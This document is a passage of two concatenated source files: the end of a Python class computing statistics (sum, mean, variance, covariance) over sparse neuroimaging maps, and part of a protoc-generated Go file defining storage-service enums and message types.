''' Compute the sum. axis=None: element-wise, axis=0: maps-wise, axis=1: voxels/labels-wise. Args: atlas (bool, optional): If True, the atlas maps are considered. **kwargs: Kwargs are passed to scipy.sparse.csr_matrix.sum() function. Returns: (numpy.ndarray) 2D numpy array ''' maps = self._get_maps(atlas=atlas) e1 = scipy.sparse.csr_matrix(np.ones((1, maps.shape[0]))) e2 = scipy.sparse.csr_matrix(np.ones((maps.shape[1], 1))) if axis is None or axis == 0: maps = e1.dot(maps) if axis is None or axis == 1: maps = maps.dot(e2) if axis not in [None, 0, 1]: raise ValueError('Axis must be None, 0 or 1.') return np.array(maps.toarray()) if keepdims else np.squeeze(np.array(maps.toarray())) def summed_map(self): ''' Sums all maps. Returns: (Maps) New Maps instance containing the summed map. ''' sum_map = Maps.copy_header(self) sum_map.maps = scipy.sparse.csr_matrix(self.sum(axis=1, keepdims=True)) return sum_map @staticmethod def _average(maps): ''' Computes the average map of the given maps on the second axis. maps : sparse CSR matrix of shape (n_voxels, n_maps) where n_voxels is the number of voxels in the box n_maps is the number of pmids Returns a sparse CSR matrix of shape (n_voxels, 1) representing the flattened average map. ''' _, n_maps = maps.shape e = scipy.sparse.csr_matrix(np.ones(n_maps)/n_maps).transpose() return maps.dot(e) @staticmethod def _variance(maps, bias=False): ''' Computes the variance map of the given maps on the second axis. Returns a sparse CSR matrix of shape (n_voxels, 1) representing the flattened variance map. ''' _, n_maps = maps.shape avg_map = Maps._average(maps) maps_squared = maps.multiply(maps) # Squared element wise avg_squared_map = Maps._average(maps_squared) squared_avg_map = avg_map.multiply(avg_map) var = avg_squared_map - squared_avg_map if not bias: var *= (n_maps/(n_maps-1)) return var def avg(self): ''' Computes the average map. Returns: (Maps) New Maps instance containing the average map. ''' avg_map = Maps.copy_header(self) avg_map.maps = self._average(self.maps) if self._has_atlas(): avg_map._maps_atlas = self._average(self._maps_atlas) return avg_map def var(self, bias=True): ''' Computes the variance map. Args: bias (bool, optional): If True, computes the biased variance (1/n_maps factor), else compute the unbiased variance (1/(n_maps-1) factor). Returns: (Maps) New Maps instance containing the variance map. ''' var_map = Maps.copy_header(self) var_map.maps = self._variance(self._maps, bias=bias) if self._has_atlas(): var_map._maps_atlas = self._variance(self._maps_atlas, bias=bias) return var_map def cov(self, atlas=True, bias=False, shrink=None, sparse=False, ignore_bg=True, verbose=None): ''' Computes the empirical covariance matrix of the voxels, the observations being the different maps. Important : Considering covariance between atlas' labels (atlas=True) instead of voxels is highly recommended since the number of voxels is often huge (~1 million), the covariance matrix would be of big shape (1 million, ~1 million) and the computation will probably not finish. Args: atlas (bool, optional): If True, consider covariance between atlas' labels. If False, covariance between voxels. Default is True (recommended). bias (bool, optional): If True, computes the biased covariance, else unbiased. Defaults to False. shrink(str, optional): Shrink the covariance matrix. If 'LW', the LedoitWolf method is applied. Default is None. sparse(bool, optional): If False, converts the sparse covariance matrix to a dense array. Else, let it sparse. Default is False ignore_bg(bool, optional): If True, ignore the first label of the atlas (background). Returns: (numpy.ndarray or scipy.sparse.csr_matrix) A 2D matrix (sparse or dense depending on sparse parameter) of shape (n_voxels, n_voxels) representing the covariance matrix. ''' if atlas and not self._has_atlas(): raise ValueError('No atlas. Must specify an atlas when initializing Maps or specify atlas=False in cov() function.') if not bias and self.n_maps <= 1: raise ValueError('Unbiased covariance computation requires at least 2 maps ({} given).'.format(self.n_maps)) verbose = self._should_verbose(verbose) maps = self._get_maps(atlas=atlas) ddof = 0 if bias else 1 if atlas: labels = self._atlas.get_labels(ignore_bg=ignore_bg) if ignore_bg and self._atlas.has_background(): maps[self._atlas.bg_index, :] = 0 if verbose: print('Computing cov matrix') e1 = scipy.sparse.csr_matrix(np.ones(self.n_maps)/(self.n_maps-ddof)).transpose().astype(self._dtype) e2 = scipy.sparse.csr_matrix(np.ones(self.n_maps)/(self.n_maps)).transpose().astype(self._dtype) M1 = maps.dot(e1) M2 = maps.dot(e2) M3 = maps.dot(maps.transpose())/((self.n_maps-ddof)) # Empirical covariance matrix S = M3 - M1.dot(M2.transpose()) del M1, M2, M3 print('To dense...') if verbose else None if not sparse: S = S.toarray() if shrink == 'LW': print('Shrink') if verbose else None S = LedoitWolf().fit(S.toarray()).covariance_ return S, labels if atlas else S @staticmethod def _power(map, n): if scipy.sparse.issparse(map): return map.power(n) elif isinstance(map, np.ndarray): return np.power(map, n) else: raise ValueError('Given map type not supported for power : {}'.format(type(map))) @staticmethod def _iterative_avg(k, previous_avg, new_value): if k == 1: return new_value return 1./k*((k-1)*previous_avg + new_value) @staticmethod def _iterative_var(k, previous_var, new_avg, new_value, bias=False): if k == 1: return 0*new_value if bias: return (k-1)/(k)*previous_var + 1./(k*(k-1))*Maps._power(new_avg - new_value, 2) + 1./(k)*Maps._power(new_value - new_avg, 2) else: return (k-2)/(k-1)*previous_var + 1./((k-1)**2)*Maps._power(new_avg - new_value, 2) + 1./(k-1)*Maps._power(new_value - new_avg, 2) def iterative_smooth_avg_var(self, compute_var=True, sigma=None, bias=False, verbose=None): ''' Compute average and variance of the maps in self.maps (previously smoothed if sigma!=None) iteratively. (Less memory usage). ''' verbose = self._should_verbose(verbose) if not compute_var: return self.avg().smooth(sigma=sigma), None avg_map = None var_map = None avg_map_atlas = None var_map_atlas = None for k in range(self.n_maps): print_percent(k, self.n_maps, 'Iterative smooth avg var {1} out of {2}... {0:.1f}%', rate=0, verbose=verbose, prefix='Maps') current_map = self._get_maps(map_id=k, atlas=False, dense=not self.save_memory) current_map = self._smooth(current_map, sigma, self._Ni, self._Nj, self._Nk) avg_map = self._iterative_avg(k+1, avg_map, current_map) var_map = self._iterative_var(k+1, var_map, avg_map, current_map, bias=bias) if self._has_atlas(): current_map_atlas = self._to_map_atlas(current_map) avg_map_atlas = self._iterative_avg(k+1, avg_map_atlas, current_map_atlas) var_map_atlas = self._iterative_var(k+1, var_map_atlas, avg_map_atlas, current_map_atlas, bias=bias) avg = Maps.copy_header(self) var = Maps.copy_header(self) if not self.save_memory: avg_map = self.array_to_map(avg_map) var_map = self.array_to_map(var_map) avg._set_maps(avg_map, refresh_atlas_maps=False) var._set_maps(var_map, refresh_atlas_maps=False) if self._has_atlas(): avg._maps_atlas = avg_map_atlas var._maps_atlas = var_map_atlas return avg, var
<reponame>butters-mars/definitions<filename>proto/storage/storage.pb.go // Code generated by protoc-gen-go. DO NOT EDIT. // source: storage.proto package def import ( context "context" fmt "fmt" _ "github.com/envoyproxy/protoc-gen-validate/validate" proto "github.com/golang/protobuf/proto" grpc "google.golang.org/grpc" codes "google.golang.org/grpc/codes" status "google.golang.org/grpc/status" math "math" ) // Reference imports to suppress errors if they are not otherwise used. var _ = proto.Marshal var _ = fmt.Errorf var _ = math.Inf // This is a compile-time assertion to ensure that this generated file // is compatible with the proto package it is being compiled against. // A compilation error at this line likely means your copy of the // proto package needs to be updated. const _ = proto.ProtoPackageIsVersion3 // please upgrade the proto package type CountType int32 const ( CountType_CountBoth CountType = 0 CountType_CountFromEnd CountType = 1 CountType_CountToEnd CountType = 2 CountType_CountNone CountType = 3 ) var CountType_name = map[int32]string{ 0: "CountBoth", 1: "CountFromEnd", 2: "CountToEnd", 3: "CountNone", } var CountType_value = map[string]int32{ "CountBoth": 0, "CountFromEnd": 1, "CountToEnd": 2, "CountNone": 3, } func (x CountType) String() string { return proto.EnumName(CountType_name, int32(x)) } func (CountType) EnumDescriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{0} } type State int32 const ( State_StateDeleted State = 0 State_StatePrivate State = 1 State_State1 State = 2 State_State2 State = 3 State_State3 State = 4 State_StateFriend State = 5 State_StatePublic State = 6 ) var State_name = map[int32]string{ 0: "StateDeleted", 1: "StatePrivate", 2: "State1", 3: "State2", 4: "State3", 5: "StateFriend", 6: "StatePublic", } var State_value = map[string]int32{ "StateDeleted": 0, "StatePrivate": 1, "State1": 2, "State2": 3, "State3": 4, "StateFriend": 5, "StatePublic": 6, } func (x State) String() string { return proto.EnumName(State_name, int32(x)) } func (State) EnumDescriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{1} } type Op int32 const ( Op_Eq Op = 0 Op_Gt Op = 1 Op_Ge Op = 2 Op_Lt Op = 3 Op_Le Op = 4 Op_Ne Op = 5 Op_In Op = 6 ) var Op_name = map[int32]string{ 0: "Eq", 1: "Gt", 2: "Ge", 3: "Lt", 4: "Le", 5: "Ne", 6: "In", } var Op_value = map[string]int32{ "Eq": 0, "Gt": 1, "Ge": 2, "Lt": 3, "Le": 4, "Ne": 5, "In": 6, } func (x Op) String() string { return proto.EnumName(Op_name, int32(x)) } func (Op) EnumDescriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{2} } type UpdateAction int32 const ( UpdateAction_Set UpdateAction = 0 UpdateAction_Incr UpdateAction = 1 UpdateAction_Add UpdateAction = 2 UpdateAction_Remove UpdateAction = 3 ) var UpdateAction_name = map[int32]string{ 0: "Set", 1: "Incr", 2: "Add", 3: "Remove", } var UpdateAction_value = map[string]int32{ "Set": 0, "Incr": 1, "Add": 2, "Remove": 3, } func (x UpdateAction) String() string { return proto.EnumName(UpdateAction_name, int32(x)) } func (UpdateAction) EnumDescriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{3} } type ValueType int32 const ( ValueType_String ValueType = 0 ValueType_Int64 ValueType = 1 ValueType_Int ValueType = 2 ValueType_Double ValueType = 3 ValueType_Bool ValueType = 4 ValueType_Bytes ValueType = 5 ) var ValueType_name = map[int32]string{ 0: "String", 1: "Int64", 2: "Int", 3: "Double", 4: "Bool", 5: "Bytes", } var ValueType_value = map[string]int32{ "String": 0, "Int64": 1, "Int": 2, "Double": 3, "Bool": 4, "Bytes": 5, } func (x ValueType) String() string { return proto.EnumName(ValueType_name, int32(x)) } func (ValueType) EnumDescriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{4} } type SortDir int32 const ( SortDir_Asc SortDir = 0 SortDir_Desc SortDir = 1 ) var SortDir_name = map[int32]string{ 0: "Asc", 1: "Desc", } var SortDir_value = map[string]int32{ "Asc": 0, "Desc": 1, } func (x SortDir) String() string { return proto.EnumName(SortDir_name, int32(x)) } func (SortDir) EnumDescriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{5} } type RType struct { From string `protobuf:"bytes,1,opt,name=from,proto3" json:"from,omitempty"` To string `protobuf:"bytes,2,opt,name=to,proto3" json:"to,omitempty"` Verb string `protobuf:"bytes,3,opt,name=verb,proto3" json:"verb,omitempty"` Multiple bool `protobuf:"varint,4,opt,name=multiple,proto3" json:"multiple,omitempty"` CountType CountType `protobuf:"varint,5,opt,name=countType,proto3,enum=def.CountType" json:"countType,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *RType) Reset() { *m = RType{} } func (m *RType) String() string { return proto.CompactTextString(m) } func (*RType) ProtoMessage() {} func (*RType) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{0} } func (m *RType) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_RType.Unmarshal(m, b) } func (m *RType) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_RType.Marshal(b, m, deterministic) } func (m *RType) XXX_Merge(src proto.Message) { xxx_messageInfo_RType.Merge(m, src) } func (m *RType) XXX_Size() int { return xxx_messageInfo_RType.Size(m) } func (m *RType) XXX_DiscardUnknown() { xxx_messageInfo_RType.DiscardUnknown(m) } var xxx_messageInfo_RType proto.InternalMessageInfo func (m *RType) GetFrom() string { if m != nil { return m.From } return "" } func (m *RType) GetTo() string { if m != nil { return m.To } return "" } func (m *RType) GetVerb() string { if m != nil { return m.Verb } return "" } func (m *RType) GetMultiple() bool { if m != nil { return m.Multiple } return false } func (m *RType) GetCountType() CountType { if m != nil { return m.CountType } return CountType_CountBoth } type EType struct { Name string `protobuf:"bytes,1,opt,name=name,proto3" json:"name,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *EType) Reset() { *m = EType{} } func (m *EType) String() string { return proto.CompactTextString(m) } func (*EType) ProtoMessage() {} func (*EType) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{1} } func (m *EType) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_EType.Unmarshal(m, b) } func (m *EType) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_EType.Marshal(b, m, deterministic) } func (m *EType) XXX_Merge(src proto.Message) { xxx_messageInfo_EType.Merge(m, src) } func (m *EType) XXX_Size() int { return xxx_messageInfo_EType.Size(m) } func (m *EType) XXX_DiscardUnknown() { xxx_messageInfo_EType.DiscardUnknown(m) } var xxx_messageInfo_EType proto.InternalMessageInfo func (m *EType) GetName() string { if m != nil { return m.Name } return "" } type E struct { Type string `protobuf:"bytes,1,opt,name=Type,proto3" json:"Type,omitempty"` ID string `protobuf:"bytes,2,opt,name=ID,proto3" json:"ID,omitempty"` ID1 string `protobuf:"bytes,3,opt,name=ID1,proto3" json:"ID1,omitempty"` ID2 string `protobuf:"bytes,4,opt,name=ID2,proto3" json:"ID2,omitempty"` ID3 string `protobuf:"bytes,5,opt,name=ID3,proto3" json:"ID3,omitempty"` CTime int64 `protobuf:"varint,6,opt,name=CTime,proto3" json:"CTime,omitempty"` UTime int64 `protobuf:"varint,7,opt,name=UTime,proto3" json:"UTime,omitempty"` State State `protobuf:"varint,8,opt,name=State,proto3,enum=def.State" json:"State,omitempty"` Tags []string `protobuf:"bytes,9,rep,name=Tags,proto3" json:"Tags,omitempty"` Meta map[string]string `protobuf:"bytes,10,rep,name=Meta,proto3" json:"Meta,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"` Content map[string]string `protobuf:"bytes,11,rep,name=Content,proto3" json:"Content,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"` Score int64 `protobuf:"varint,12,opt,name=Score,proto3" json:"Score,omitempty"` Score1 int64 `protobuf:"varint,13,opt,name=Score1,proto3" json:"Score1,omitempty"` Resources []string `protobuf:"bytes,14,rep,name=Resources,proto3" json:"Resources,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *E) Reset() { *m = E{} } func (m *E) String() string { return proto.CompactTextString(m) } func (*E) ProtoMessage() {} func (*E) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{2} } func (m *E) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_E.Unmarshal(m, b) } func (m *E) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_E.Marshal(b, m, deterministic) } func (m *E) XXX_Merge(src proto.Message) { xxx_messageInfo_E.Merge(m, src) } func (m *E) XXX_Size() int { return xxx_messageInfo_E.Size(m) } func (m *E) XXX_DiscardUnknown() { xxx_messageInfo_E.DiscardUnknown(m) } var xxx_messageInfo_E proto.InternalMessageInfo func (m *E) GetType() string { if m != nil { return m.Type } return "" } func (m *E) GetID() string { if m != nil { return m.ID } return "" } func (m *E) GetID1() string { if m != nil { return m.ID1 } return "" } func (m *E) GetID2() string { if m != nil { return m.ID2 } return "" } func (m *E) GetID3() string { if m != nil { return m.ID3 } return "" } func (m *E) GetCTime() int64 { if m != nil { return m.CTime } return 0 } func (m *E) GetUTime() int64 { if m != nil { return m.UTime } return 0 } func (m *E) GetState() State { if m != nil { return m.State } return State_StateDeleted } func (m *E) GetTags() []string { if m != nil { return m.Tags } return nil } func (m *E) GetMeta() map[string]string { if m != nil { return m.Meta } return nil } func (m *E) GetContent() map[string]string { if m != nil { return m.Content } return nil } func (m *E) GetScore() int64 { if m != nil { return m.Score } return 0 } func (m *E) GetScore1() int64 { if m != nil { return m.Score1 } return 0 } func (m *E) GetResources() []string { if m != nil { return m.Resources } return nil } type DefineETypeReq struct { EType *EType `protobuf:"bytes,1,opt,name=eType,proto3" json:"eType,omitempty"` CreationRTypes []*RType `protobuf:"bytes,2,rep,name=creationRTypes,proto3" json:"creationRTypes,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *DefineETypeReq) Reset() { *m = DefineETypeReq{} } func (m *DefineETypeReq) String() string { return proto.CompactTextString(m) } func (*DefineETypeReq) ProtoMessage() {} func (*DefineETypeReq) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{3} } func (m *DefineETypeReq) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_DefineETypeReq.Unmarshal(m, b) } func (m *DefineETypeReq) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_DefineETypeReq.Marshal(b, m, deterministic) } func (m *DefineETypeReq) XXX_Merge(src proto.Message) { xxx_messageInfo_DefineETypeReq.Merge(m, src) } func (m *DefineETypeReq) XXX_Size() int { return xxx_messageInfo_DefineETypeReq.Size(m) } func (m *DefineETypeReq) XXX_DiscardUnknown() { xxx_messageInfo_DefineETypeReq.DiscardUnknown(m) } var xxx_messageInfo_DefineETypeReq proto.InternalMessageInfo func (m *DefineETypeReq) GetEType() *EType { if m != nil { return m.EType } return nil } func (m *DefineETypeReq) GetCreationRTypes() []*RType { if m != nil { return m.CreationRTypes } return nil } type CreateEWithRsReq struct { E *E `protobuf:"bytes,1,opt,name=e,proto3" json:"e,omitempty"` Related []*E `protobuf:"bytes,2,rep,name=related,proto3" json:"related,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *CreateEWithRsReq) Reset() { *m = CreateEWithRsReq{} } func (m *CreateEWithRsReq) String() string { return proto.CompactTextString(m) } func (*CreateEWithRsReq) ProtoMessage() {} func (*CreateEWithRsReq) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{4} } func (m *CreateEWithRsReq) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_CreateEWithRsReq.Unmarshal(m, b) } func (m *CreateEWithRsReq) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_CreateEWithRsReq.Marshal(b, m, deterministic) } func (m *CreateEWithRsReq) XXX_Merge(src proto.Message) { xxx_messageInfo_CreateEWithRsReq.Merge(m, src) } func (m *CreateEWithRsReq) XXX_Size() int { return xxx_messageInfo_CreateEWithRsReq.Size(m) } func (m *CreateEWithRsReq) XXX_DiscardUnknown() { xxx_messageInfo_CreateEWithRsReq.DiscardUnknown(m) } var xxx_messageInfo_CreateEWithRsReq proto.InternalMessageInfo func (m *CreateEWithRsReq) GetE() *E { if m != nil { return m.E } return nil } func (m *CreateEWithRsReq) GetRelated() []*E { if m != nil { return m.Related } return nil } type RelationReq struct { From *E `protobuf:"bytes,1,opt,name=from,proto3" json:"from,omitempty"` To *E `protobuf:"bytes,2,opt,name=to,proto3" json:"to,omitempty"` Verb string `protobuf:"bytes,3,opt,name=verb,proto3" json:"verb,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *RelationReq) Reset() { *m = RelationReq{} } func (m *RelationReq) String() string { return proto.CompactTextString(m) } func (*RelationReq) ProtoMessage() {} func (*RelationReq) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{5} } func (m *RelationReq) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_RelationReq.Unmarshal(m, b) } func (m *RelationReq) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_RelationReq.Marshal(b, m, deterministic) } func (m *RelationReq) XXX_Merge(src proto.Message) { xxx_messageInfo_RelationReq.Merge(m, src) } func (m *RelationReq) XXX_Size() int { return xxx_messageInfo_RelationReq.Size(m) } func (m *RelationReq) XXX_DiscardUnknown() { xxx_messageInfo_RelationReq.DiscardUnknown(m) } var xxx_messageInfo_RelationReq proto.InternalMessageInfo func (m *RelationReq) GetFrom() *E { if m != nil { return m.From } return nil } func (m *RelationReq) GetTo() *E { if m != nil { return m.To } return nil } func (m *RelationReq) GetVerb() string { if m != nil { return m.Verb } return "" } type GetByIDsReq struct { Type string `protobuf:"bytes,1,opt,name=type,proto3" json:"type,omitempty"` Ids []string `protobuf:"bytes,2,rep,name=ids,proto3" json:"ids,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *GetByIDsReq) Reset() { *m = GetByIDsReq{} } func (m *GetByIDsReq) String() string { return proto.CompactTextString(m) } func (*GetByIDsReq) ProtoMessage() {} func (*GetByIDsReq) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{6} } func (m *GetByIDsReq) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_GetByIDsReq.Unmarshal(m, b) } func (m *GetByIDsReq) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_GetByIDsReq.Marshal(b, m, deterministic) } func (m *GetByIDsReq) XXX_Merge(src proto.Message) { xxx_messageInfo_GetByIDsReq.Merge(m, src) } func (m *GetByIDsReq) XXX_Size() int { return xxx_messageInfo_GetByIDsReq.Size(m) } func (m *GetByIDsReq) XXX_DiscardUnknown() { xxx_messageInfo_GetByIDsReq.DiscardUnknown(m) } var xxx_messageInfo_GetByIDsReq proto.InternalMessageInfo func (m *GetByIDsReq) GetType() string { if m != nil { return m.Type } return "" } func (m *GetByIDsReq) GetIds() []string { if m != nil { return m.Ids } return nil } type EList struct { List []*E `protobuf:"bytes,1,rep,name=list,proto3" json:"list,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *EList) Reset() { *m = EList{} } func (m *EList) String() string { return proto.CompactTextString(m) } func (*EList) ProtoMessage() {} func (*EList) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{7} } func (m *EList) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_EList.Unmarshal(m, b) } func (m *EList) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_EList.Marshal(b, m, deterministic) } func (m *EList) XXX_Merge(src proto.Message) { xxx_messageInfo_EList.Merge(m, src) } func (m *EList) XXX_Size() int { return xxx_messageInfo_EList.Size(m) } func (m *EList) XXX_DiscardUnknown() { xxx_messageInfo_EList.DiscardUnknown(m) } var xxx_messageInfo_EList proto.InternalMessageInfo func (m *EList) GetList() []*E { if m != nil { return m.List } return nil } type Empty struct { XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *Empty) Reset() { *m = Empty{} } func (m *Empty) String() string { return proto.CompactTextString(m) } func (*Empty) ProtoMessage() {} func (*Empty) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{8} } func (m *Empty) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_Empty.Unmarshal(m, b) } func (m *Empty) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_Empty.Marshal(b, m, deterministic) } func (m *Empty) XXX_Merge(src proto.Message) { xxx_messageInfo_Empty.Merge(m, src) } func (m *Empty) XXX_Size() int { return xxx_messageInfo_Empty.Size(m) } func (m *Empty) XXX_DiscardUnknown() { xxx_messageInfo_Empty.DiscardUnknown(m) } var xxx_messageInfo_Empty proto.InternalMessageInfo type HasRelationResp struct { Has bool `protobuf:"varint,1,opt,name=has,proto3" json:"has,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *HasRelationResp) Reset() { *m = HasRelationResp{} } func (m *HasRelationResp) String() string { return proto.CompactTextString(m) } func (*HasRelationResp) ProtoMessage() {} func (*HasRelationResp) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{9} } func (m *HasRelationResp) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_HasRelationResp.Unmarshal(m, b) } func (m *HasRelationResp) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_HasRelationResp.Marshal(b, m, deterministic) } func (m *HasRelationResp) XXX_Merge(src proto.Message) { xxx_messageInfo_HasRelationResp.Merge(m, src) } func (m *HasRelationResp) XXX_Size() int { return xxx_messageInfo_HasRelationResp.Size(m) } func (m *HasRelationResp) XXX_DiscardUnknown() { xxx_messageInfo_HasRelationResp.DiscardUnknown(m) } var xxx_messageInfo_HasRelationResp proto.InternalMessageInfo func (m *HasRelationResp) GetHas() bool { if m != nil { return m.Has } return false } type Query struct { Field string `protobuf:"bytes,1,opt,name=Field,proto3" json:"Field,omitempty"` Op Op `protobuf:"varint,2,opt,name=Op,proto3,enum=def.Op" json:"Op,omitempty"` Value string `protobuf:"bytes,3,opt,name=Value,proto3" json:"Value,omitempty"` ValueType ValueType `protobuf:"varint,4,opt,name=ValueType,proto3,enum=def.ValueType" json:"ValueType,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *Query) Reset() { *m = Query{} } func (m *Query) String() string { return proto.CompactTextString(m) } func (*Query) ProtoMessage() {} func (*Query) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{10} } func (m *Query) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_Query.Unmarshal(m, b) } func (m *Query) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_Query.Marshal(b, m, deterministic) } func (m *Query) XXX_Merge(src proto.Message) { xxx_messageInfo_Query.Merge(m, src) } func (m *Query) XXX_Size() int { return xxx_messageInfo_Query.Size(m) } func (m *Query) XXX_DiscardUnknown() { xxx_messageInfo_Query.DiscardUnknown(m) } var xxx_messageInfo_Query proto.InternalMessageInfo func (m *Query) GetField() string { if m != nil { return m.Field } return "" } func (m *Query) GetOp() Op { if m != nil { return m.Op } return Op_Eq } func (m *Query) GetValue() string { if m != nil { return m.Value } return "" } func (m *Query) GetValueType() ValueType { if m != nil { return m.ValueType } return ValueType_String } type Limit struct { From string `protobuf:"bytes,1,opt,name=From,proto3" json:"From,omitempty"` Limit int32 `protobuf:"varint,2,opt,name=Limit,proto3" json:"Limit,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *Limit) Reset() { *m = Limit{} } func (m *Limit) String() string { return proto.CompactTextString(m) } func (*Limit) ProtoMessage() {} func (*Limit) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{11} } func (m *Limit) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_Limit.Unmarshal(m, b) } func (m *Limit) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_Limit.Marshal(b, m, deterministic) } func (m *Limit) XXX_Merge(src proto.Message) { xxx_messageInfo_Limit.Merge(m, src) } func (m *Limit) XXX_Size() int { return xxx_messageInfo_Limit.Size(m) } func (m *Limit) XXX_DiscardUnknown() { xxx_messageInfo_Limit.DiscardUnknown(m) } var xxx_messageInfo_Limit proto.InternalMessageInfo func (m *Limit) GetFrom() string { if m != nil { return m.From } return "" } func (m *Limit) GetLimit() int32 { if m != nil { return m.Limit } return 0 } type Update struct { Field string `protobuf:"bytes,1,opt,name=Field,proto3" json:"Field,omitempty"` Action UpdateAction `protobuf:"varint,2,opt,name=Action,proto3,enum=def.UpdateAction" json:"Action,omitempty"` Value string `protobuf:"bytes,3,opt,name=Value,proto3" json:"Value,omitempty"` ValueType ValueType `protobuf:"varint,4,opt,name=ValueType,proto3,enum=def.ValueType" json:"ValueType,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *Update) Reset() { *m = Update{} } func (m *Update) String() string { return proto.CompactTextString(m) } func (*Update) ProtoMessage() {} func (*Update) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{12} } func (m *Update) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_Update.Unmarshal(m, b) } func (m *Update) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_Update.Marshal(b, m, deterministic) } func (m *Update) XXX_Merge(src proto.Message) { xxx_messageInfo_Update.Merge(m, src) } func (m *Update) XXX_Size() int { return xxx_messageInfo_Update.Size(m) } func (m *Update) XXX_DiscardUnknown() { xxx_messageInfo_Update.DiscardUnknown(m) } var xxx_messageInfo_Update proto.InternalMessageInfo func (m *Update) GetField() string { if m != nil { return m.Field } return "" } func (m *Update) GetAction() UpdateAction { if m != nil { return m.Action } return UpdateAction_Set } func (m *Update) GetValue() string { if m != nil { return m.Value } return "" } func (m *Update) GetValueType() ValueType { if m != nil { return m.ValueType } return ValueType_String } type Paged struct { List []*E `protobuf:"bytes,1,rep,name=List,proto3" json:"List,omitempty"` HasMore bool `protobuf:"varint,2,opt,name=HasMore,proto3" json:"HasMore,omitempty"` NextFrom string `protobuf:"bytes,3,opt,name=NextFrom,proto3" json:"NextFrom,omitempty"` 